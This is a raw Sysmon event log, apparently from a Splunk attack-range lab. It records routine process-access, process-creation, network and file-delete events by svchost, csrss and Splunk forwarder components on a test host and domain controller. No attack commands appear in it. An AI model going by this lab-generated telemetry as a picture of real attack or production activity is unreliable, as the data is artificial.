12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017430Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017429Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017428Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017427Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E539-63C7-1902-00000000B002}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017426Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017425Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017424Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017423Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017422Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017421Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.650{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E539-63C7-1902-00000000B002}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017420Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.652{E5A8D418-E539-63C7-1902-00000000B002}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017419Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.474{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0228989B8C9ECF9A7F3637013F7BF64F,SHA256=5D67DB8BFAF591796ECE946A3C10EFF0179216BF6E81B5D7C4E831B796D17CF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E539-63C7-6406-00000000AF02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E539-63C7-6406-00000000AF02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.731{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E539-63C7-6406-00000000AF02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.732{FE4C2B44-E539-63C7-6406-00000000AF02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:27.129{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56406-false10.0.1.12-8089- 23542300x800000000000000044906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:29.403{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2963E6612F1D05CEF5227FA4A3D62EFB,SHA256=0C4ACCD1057EC17B97348532DF0600F2BB42DE5A421CEE4B247C4995F631372B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017418Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E539-63C7-1802-00000000B002}972C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017417Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017416Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017415Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017414Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:29.146{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017413Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 